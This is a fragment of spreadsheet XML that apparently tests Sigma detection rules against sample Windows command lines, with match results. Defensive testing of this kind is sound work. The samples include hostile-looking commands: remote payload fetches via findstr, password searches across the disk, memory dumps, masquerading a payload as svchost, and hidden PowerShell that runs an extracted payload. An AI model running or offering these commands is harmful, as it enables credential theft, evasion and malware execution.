      <c r="B2705" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C2705" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D2705" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E2705" s="43" t="inlineStr">
        <is>
          <t>"C:\Users\SwachchhandaP\Downloads\advancedrun-x64\AdvancedRun.exe" /EXEFilename "cmd.exe" /Run</t>
        </is>
      </c>
      <c r="F2705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2705" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2705" s="43" t="n"/>
      <c r="J2705" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2705" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2706" ht="15.75" customHeight="1" s="42">
      <c r="A2706" s="43" t="inlineStr">
        <is>
          <t>t1134.002</t>
        </is>
      </c>
      <c r="B2706" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun_priv_user</t>
        </is>
      </c>
      <c r="C2706" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Suspicious Execution</t>
        </is>
      </c>
      <c r="D2706" s="43" t="inlineStr">
        <is>
          <t>fa00b701-44c6-4679-994d-5a18afa8a707</t>
        </is>
      </c>
      <c r="E2706" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename cmd.exe /RunAs 8 /Run</t>
        </is>
      </c>
      <c r="F2706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2706" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2706" s="43" t="n"/>
      <c r="J2706" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2706" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2707" ht="15.75" customHeight="1" s="42">
      <c r="A2707" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B2707" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_rcedit_execution</t>
        </is>
      </c>
      <c r="C2707" s="43" t="inlineStr">
        <is>
          <t>PUA - Potential PE Metadata Tamper Using Rcedit</t>
        </is>
      </c>
      <c r="D2707" s="43" t="inlineStr">
        <is>
          <t>0c92f2e6-f08f-4b73-9216-ecb0ca634689</t>
        </is>
      </c>
      <c r="E2707" s="43" t="inlineStr">
        <is>
          <t>rcedit-x64.exe payload.exe --set-version-string OriginalFileName svchost.exe</t>
        </is>
      </c>
      <c r="F2707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2707" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2707" s="43" t="n"/>
      <c r="J2707" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2707" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2708" ht="15.75" customHeight="1" s="42">
      <c r="A2708" s="43" t="inlineStr">
        <is>
          <t>t1036.003</t>
        </is>
      </c>
      <c r="B2708" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_sysinternals_procdump</t>
        </is>
      </c>
      <c r="C2708" s="43" t="inlineStr">
        <is>
          <t>Renamed ProcDump Execution</t>
        </is>
      </c>
      <c r="D2708" s="43" t="inlineStr">
        <is>
          <t>4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67</t>
        </is>
      </c>
      <c r="E2708" s="43" t="inlineStr">
        <is>
          <t>procdump.exe -ma /accepteula C:\temp\memory.dmp</t>
        </is>
      </c>
      <c r="F2708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2708" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2708" s="43" t="n"/>
      <c r="J2708" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2708" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2709" ht="15.75" customHeight="1" s="42">
      <c r="A2709" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2709" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_import_from_suspicious_paths</t>
        </is>
      </c>
      <c r="C2709" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Registry File Imported Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2709" s="43" t="inlineStr">
        <is>
          <t>62e0298b-e994-4189-bc87-bc699aa62d97</t>
        </is>
      </c>
      <c r="E2709" s="43" t="inlineStr">
        <is>
          <t>reg.exe" import "C:\Windows\Temp\registry_settings.reg"</t>
        </is>
      </c>
      <c r="F2709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2709" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2709" s="43" t="n"/>
      <c r="J2709" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2709" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2710" ht="15.75" customHeight="1" s="42">
      <c r="A2710" s="43" t="inlineStr">
        <is>
          <t>t1112</t>
        </is>
      </c>
      <c r="B2710" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_shimcache_flush</t>
        </is>
      </c>
      <c r="C2710" s="43" t="inlineStr">
        <is>
          <t>ShimCache Flush</t>
        </is>
      </c>
      <c r="D2710" s="43" t="inlineStr">
        <is>
          <t>b0524451-19af-4efa-a46f-562a977f792e</t>
        </is>
      </c>
      <c r="E2710" s="43" t="inlineStr">
        <is>
          <t>copy rundll32.exe not_rundll.exe &amp;&amp; not_rundll.exe apphelp.dll,ShimFlushCache</t>
        </is>
      </c>
      <c r="F2710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2710" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2710" s="43" t="n"/>
      <c r="J2710" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2710" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2711" ht="15.75" customHeight="1" s="42">
      <c r="A2711" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B2711" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_no_flag_or_dll_execution</t>
        </is>
      </c>
      <c r="C2711" s="43" t="inlineStr">
        <is>
          <t>RegAsm.EXE Execution Without CommandLine Flags or Files</t>
        </is>
      </c>
      <c r="D2711" s="43" t="inlineStr">
        <is>
          <t>651f87f7-12db-47f9-84c5-f27b081b94b6</t>
        </is>
      </c>
      <c r="E2711" s="43" t="inlineStr">
        <is>
          <t>RegAsm.exe /nologo</t>
        </is>
      </c>
      <c r="F2711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2711" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2711" s="43" t="n"/>
      <c r="J2711" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2711" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2712" ht="15.75" customHeight="1" s="42">
      <c r="A2712" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B2712" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C2712" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D2712" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E2712" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe" C:\Users\thaim\AppData\Local\Temp\T1218.009.dll</t>
        </is>
      </c>
      <c r="F2712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2712" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2712" s="43" t="n"/>
      <c r="J2712" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2712" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2713" ht="15.75" customHeight="1" s="42">
      <c r="A2713" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B2713" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C2713" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D2713" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E2713" s="43" t="inlineStr">
        <is>
          <t>regasm.exe payload.dll</t>
        </is>
      </c>
      <c r="F2713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2713" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2713" s="43" t="n"/>
      <c r="J2713" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2713" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2714" ht="15.75" customHeight="1" s="42">
      <c r="A2714" s="43" t="inlineStr">
        <is>
          <t>t1218.009</t>
        </is>
      </c>
      <c r="B2714" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regasm_regsvcs_uncommon_location_execution</t>
        </is>
      </c>
      <c r="C2714" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location</t>
        </is>
      </c>
      <c r="D2714" s="43" t="inlineStr">
        <is>
          <t>cc368ed0-2411-45dc-a222-510ace303cb2</t>
        </is>
      </c>
      <c r="E2714" s="43" t="inlineStr">
        <is>
          <t>regsvcs.exe payload.dll</t>
        </is>
      </c>
      <c r="F2714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2714" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2714" s="43" t="n"/>
      <c r="J2714" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2714" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2715" ht="15.75" customHeight="1" s="42">
      <c r="A2715" s="43" t="inlineStr">
        <is>
          <t>t1218.010</t>
        </is>
      </c>
      <c r="B2715" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_regsvr32_susp_extensions</t>
        </is>
      </c>
      <c r="C2715" s="43" t="inlineStr">
        <is>
          <t>Regsvr32 DLL Execution With Suspicious File Extension</t>
        </is>
      </c>
      <c r="D2715" s="43" t="inlineStr">
        <is>
          <t>089fc3d2-71e8-4763-a8a5-c97fbb0a403e</t>
        </is>
      </c>
      <c r="E2715" s="43" t="inlineStr">
        <is>
          <t>"C:\Windows\system32\regsvr32.exe" -s "C:\Users\thaim\AppData\Local\Temp\shell32.jpg"</t>
        </is>
      </c>
      <c r="F2715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2715" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2715" s="43" t="n"/>
      <c r="J2715" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2715" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2716" ht="15.75" customHeight="1" s="42">
      <c r="A2716" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B2716" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C2716" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D2716" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E2716" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -arg "cmd.exe" /c echo test</t>
        </is>
      </c>
      <c r="F2716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2716" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2716" s="43" t="n"/>
      <c r="J2716" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2716" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2717" ht="15.75" customHeight="1" s="42">
      <c r="A2717" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B2717" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C2717" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D2717" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E2717" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -run rundll32.exe some.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F2717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2717" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2717" s="43" t="n"/>
      <c r="J2717" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2717" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2718" ht="15.75" customHeight="1" s="42">
      <c r="A2718" s="43" t="inlineStr">
        <is>
          <t>t1564</t>
        </is>
      </c>
      <c r="B2718" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_execution_from_public_folder_as_parent</t>
        </is>
      </c>
      <c r="C2718" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Execution From Parent Process In Public Folder</t>
        </is>
      </c>
      <c r="D2718" s="43" t="inlineStr">
        <is>
          <t>69bd9b97-2be2-41b6-9816-fb08757a4d1a</t>
        </is>
      </c>
      <c r="E2718" s="43" t="inlineStr">
        <is>
          <t>Parent.exe -start cscript.exe //B script.vbs</t>
        </is>
      </c>
      <c r="F2718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2718" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2718" s="43" t="n"/>
      <c r="J2718" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2718" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2719" ht="15.75" customHeight="1" s="42">
      <c r="A2719" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2719" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_agentexecutor_potential_abuse</t>
        </is>
      </c>
      <c r="C2719" s="43" t="inlineStr">
        <is>
          <t>AgentExecutor PowerShell Execution</t>
        </is>
      </c>
      <c r="D2719" s="43" t="inlineStr">
        <is>
          <t>7efd2c8d-8b18-45b7-947d-adfe9ed04f61</t>
        </is>
      </c>
      <c r="E2719" s="43" t="inlineStr">
        <is>
          <t>AgentExecutor.exe -powershell script.ps1 C:\out.txt C:\err.txt C:\timeout.txt 60000 C:\Windows\System32\WindowsPowerShell\v1.0\ 0 0</t>
        </is>
      </c>
      <c r="F2719" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2719" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2719" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2719" s="43" t="inlineStr">
        <is>
          <t>Uncommon AddinUtil.EXE CommandLine Execution (4f2cd9b6-4a17-440f-bb2a-687abb65993a)</t>
        </is>
      </c>
      <c r="J2719" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2719" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2720" ht="15.75" customHeight="1" s="42">
      <c r="A2720" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2720" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_certoc_load_dll</t>
        </is>
      </c>
      <c r="C2720" s="43" t="inlineStr">
        <is>
          <t>DLL Loaded via CertOC.EXE</t>
        </is>
      </c>
      <c r="D2720" s="43" t="inlineStr">
        <is>
          <t>242301bc-f92f-4476-8718-78004a6efd9f</t>
        </is>
      </c>
      <c r="E2720" s="43" t="inlineStr">
        <is>
          <t>certoc.exe -loaddll malicious.dll</t>
        </is>
      </c>
      <c r="F2720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2720" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2720" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2720" s="43" t="inlineStr">
        <is>
          <t>Suspicious AddinUtil.EXE CommandLine Execution (631b22a4-70f4-4e2f-9ea8-42f84d9df6d8); Uncommon AddinUtil.EXE CommandLine Execution (4f2cd9b6-4a17-440f-bb2a-687abb65993a)</t>
        </is>
      </c>
      <c r="J2720" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2720" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2721" ht="15.75" customHeight="1" s="42">
      <c r="A2721" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2721" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C2721" s="43" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D2721" s="43" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E2721" s="43" t="inlineStr">
        <is>
          <t>diskshadow.exe /s C:\Users\Public\script.txt | findstr /v ""</t>
        </is>
      </c>
      <c r="F2721" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2721" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2721" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2721" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J2721" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2721" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2722" ht="15.75" customHeight="1" s="42">
      <c r="A2722" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2722" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2722" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2722" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2722" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" &amp;&amp; echo Done</t>
        </is>
      </c>
      <c r="F2722" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2722" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2722" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2722" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J2722" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2722" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2723" ht="15.75" customHeight="1" s="42">
      <c r="A2723" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2723" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2723" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2723" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2723" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^| more</t>
        </is>
      </c>
      <c r="F2723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2723" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2723" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2723" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J2723" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2723" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2724" ht="15.75" customHeight="1" s="42">
      <c r="A2724" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2724" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2724" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2724" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2724" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&gt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F2724" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2724" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2724" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2724" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J2724" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2724" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2725" ht="15.75" customHeight="1" s="42">
      <c r="A2725" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2725" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2725" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2725" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2725" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt; NUL</t>
        </is>
      </c>
      <c r="F2725" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2725" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2725" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2725" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J2725" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2725" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2726" ht="15.75" customHeight="1" s="42">
      <c r="A2726" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2726" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C2726" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2726" s="43" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E2726" s="43" t="inlineStr">
        <is>
          <t>findstr -v -l . "\\192.168.1.100\share\payload.txt" ^&lt;^&gt; NUL</t>
        </is>
      </c>
      <c r="F2726" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2726" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2726" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa); Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J2726" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2726" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2727" ht="15.75" customHeight="1" s="42">
      <c r="A2727" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2727" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2727" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2727" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2727" s="43" t="inlineStr">
        <is>
          <t>findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2727" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2727" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2727" s="43" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE (587254ee-a24b-4335-b3cd-065c0f1f4baa)</t>
        </is>
      </c>
      <c r="J2727" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2727" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2728" ht="15.75" customHeight="1" s="42">
      <c r="A2728" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2728" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2728" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2728" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2728" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c findstr /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2728" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2728" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2728" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2728" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J2728" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2728" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2729" ht="15.75" customHeight="1" s="42">
      <c r="A2729" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2729" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_subfolder_search</t>
        </is>
      </c>
      <c r="C2729" s="43" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D2729" s="43" t="inlineStr">
        <is>
          <t>04936b66-3915-43ad-a8e5-809eadfd1141</t>
        </is>
      </c>
      <c r="E2729" s="43" t="inlineStr">
        <is>
          <t>copy findstr.exe grep.exe &amp;&amp; grep.exe /s /i "password" C:\*.txt</t>
        </is>
      </c>
      <c r="F2729" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2729" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2729" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2729" s="43" t="inlineStr">
        <is>
          <t>Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location (b2b048b0-7857-4380-b0fb-d3f0ab820b71)</t>
        </is>
      </c>
      <c r="J2729" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2729" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2730" ht="15.75" customHeight="1" s="42">
      <c r="A2730" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2730" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_zipexec</t>
        </is>
      </c>
      <c r="C2730" s="43" t="inlineStr">
        <is>
          <t>Suspicious ZipExec Execution</t>
        </is>
      </c>
      <c r="D2730" s="43" t="inlineStr">
        <is>
          <t>90dcf730-1b71-4ae7-9ffc-6fcf62bd0132</t>
        </is>
      </c>
      <c r="E2730" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Expand-Archive -Path 'C:\Temp\payload.zip' -DestinationPath 'C:\Temp\extracted' -Force; Start-Process 'binary.exe'"</t>
        </is>
      </c>
      <c r="F2730" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2730" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2730" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2730" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J2730" s="43" t="n">
        <v>3</v>
      </c>
